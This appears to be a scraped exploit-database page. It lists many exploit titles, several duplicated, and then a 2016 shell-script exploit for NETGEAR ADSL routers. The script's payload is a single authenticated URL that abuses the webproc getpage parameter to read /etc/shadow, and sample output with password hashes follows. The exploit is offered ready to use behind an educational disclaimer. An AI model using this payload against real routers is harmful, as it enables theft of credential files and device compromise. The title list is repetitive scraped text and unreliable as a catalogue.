490539b3f3
17 new exploits DigitalHive 2.0 RC2 - (base_include.php) Remote File Inclusion DigitalHive 2.0 RC2 - 'base_include.php' Remote File Inclusion DodosMail 2.0.1 - (dodosmail.php) Remote File Inclusion DodosMail 2.0.1 - 'dodosmail.php' Remote File Inclusion DoSePa 1.0.4 - (textview.php) Information Disclosure DoSePa 1.0.4 - 'textview.php' Information Disclosure TrueCrypt 4.3 - Privilege Escalation TrueCrypt 4.3 - 'setuid' Privilege Escalation w-Agora 4.2.1 - (cat) SQL Injection w-Agora 4.2.1 - 'cat' Parameter SQL Injection IPTBB 0.5.4 - (viewdir id) SQL Injection IPTBB 0.5.4 - 'id' Parameter SQL Injection LoudBlog 0.6.1 - (parsedpage) Remote Code Execution LoudBlog 0.6.1 - 'parsedpage' Parameter Remote Code Execution evilboard 0.1a - (SQL Injection / Cross-Site Scripting) Multiple Vulnerabilities evilboard 0.1a - SQL Injection / Cross-Site Scripting QuickTime Player 7.3.1.70 - (rtsp) Buffer Overflow QuickTime Player 7.3.1.70 - 'RTSP' Buffer Overflow DigitalHive 2.0 RC2 - (user_id) SQL Injection DigitalHive 2.0 RC2 - 'user_id' Parameter SQL Injection X7 Chat 2.0.5 - 'day' SQL Injection X7 Chat 2.0.5 - 'day' Parameter SQL Injection HP Data Protector 4.00-SP1b43064 - Remote Memory Leak/Dos Exploit HP Data Protector 4.00-SP1b43064 - Remote Memory Leak/DoS Cisco VPN Client - Integer Overflow (DOS) Cisco VPN Client - Integer Overflow (DoS) Multiple WordPress Plugins - timthumb.php File Upload Multiple WordPress Plugins - 'timthumb.php' File Upload glibc - LD_AUDIT Arbitrary DSO Load Privilege Escalation glibc - 'LD_AUDIT' Arbitrary DSO Load Privilege Escalation NetServe FTP Client 1.0 - Local DOS (Overflow) NetServe FTP Client 1.0 - Local DoS (Overflow) Microsoft Windows Server 2008/2012 - LDAP RootDSE Netlogon Denial Of Service (PoC) Internet Explorer 8-11_ IIS_ CScript.exe/WScript.exe VBScript - CRegExp..Execute Use of Uninitialized Memory (MS14-080 / MS14-084) Internet Explorer 9 MSHTML - CPtsTextParaclient::CountApes Out-of-Bounds Read Microsoft Internet Explorer 8-11_ IIS_ CScript.exe/WScript.exe VBScript - CRegExp..Execute Use of Uninitialized Memory (MS14-080/MS14-084) Microsoft Internet Explorer 9 MSHTML - CPtsTextParaclient::CountApes Out-of-Bounds Read Linux Kernel 2.6.x < 2.6.7-rc3 - 'sys_chown()' Privilege Escalation Solaris 8/9 ps - Environment Variable Information leak Solaris 7/8/9 CDE libDtHelp - Buffer Overflow dtprintinfo Privilege Escalation Solaris 7/8/9 CDE libDtHelp - Buffer Overflow Non-Exec Stack Privilege Escalation Solaris 8/9 passwd(1) - 'circ()' Stack-Based Buffer Overflow Privilege Escalation Linux Kernel - TCP Related Read Use-After-Free WordPress Plugin 'XCloner' 3.1.5 - Multiple Vulnerabilities WordPress Plugin 404 to 301 2.2.8 - Persistent Cross-Site Scripting WordPress Plugin WassUp Real Time Analytics 1.9 - Persistent Cross-Site Scripting MOVISTAR ADSL Router BHS_RTA - Remote File Disclosure D-Link ADSL Router DSL-2730U/2750U/2750E - Remote File Disclosure NETGEAR ADSL Router JNR1010 - Authenticated Remote File Disclosure NETGEAR ADSL Router WNR500/WNR612v3/JNR1010/JNR2010 - Authenticated Remote File Disclosure PLANET ADSL Router AND-4101 - Remote File Disclosure Eir D1000 Wireless Router - WAN Side Remote Command Injection (Metasploit) Avira Antivirus 15.0.21.86 - '.zip' Directory Traversal / Command Execution
38 lines
1.4 KiB
Bash
Executable file
38 lines
1.4 KiB
Bash
Executable file
#!/bin/sh
|
|
#
|
|
# NETGEAR ADSL ROUTER
|
|
# Authenticated Remote File Disclosure
|
|
#
|
|
# Hardware Version: WNR500 / WNR612v3 / JNR1010 / JNR2010
|
|
# Firmware Version: 1.0.7.2 / 1.0.0.9 / 1.0.0.32 / 1.0.0.20
|
|
#
|
|
# Copyright 2016 (c) Todor Donev
|
|
# <todor.donev at gmail.com>
|
|
# https://www.ethical-hacker.org/
|
|
# https://www.facebook.com/ethicalhackerorg
|
|
#
|
|
# Disclaimer:
|
|
# This or previous programs is for Educational
|
|
# purpose ONLY. Do not use it without permission.
|
|
# The usual disclaimer applies, especially the
|
|
# fact that Todor Donev is not liable for any
|
|
# damages caused by direct or indirect use of the
|
|
# information or functionality provided by these
|
|
# programs. The author or any Internet provider
|
|
# bears NO responsibility for content or misuse
|
|
# of these programs or any derivatives thereof.
|
|
# By using these programs you accept the fact
|
|
# that any damage (dataloss, system crash,
|
|
# system compromise, etc.) caused by the use
|
|
# of these programs is not Todor Donev's
|
|
# responsibility.
|
|
#
|
|
# Use them at your own risk!
|
|
#
|
|
# Thanks to Maya Hristova that support me.
|
|
|
|
http://USER:PASSWORD@TARGET:PORT/cgi-bin/webproc?getpage=/etc/shadow&errorpage=html/main.html&var:language=en_us&var:language=en_us&var:page=BAS_bpa
|
|
|
|
# #root:$1$BOYmzSKq$ePjEPSpkQGeBcZjlEeLqI.:13796:0:99999:7:::
|
|
# root:$1$BOYmzSKq$ePjEPSpkQGeBcZjlEeLqI.:13796:0:99999:7:::
|
|
# #tw:$1$zxEm2v6Q$qEbPfojsrrE/YkzqRm7qV/:13796:0:99999:7:::
|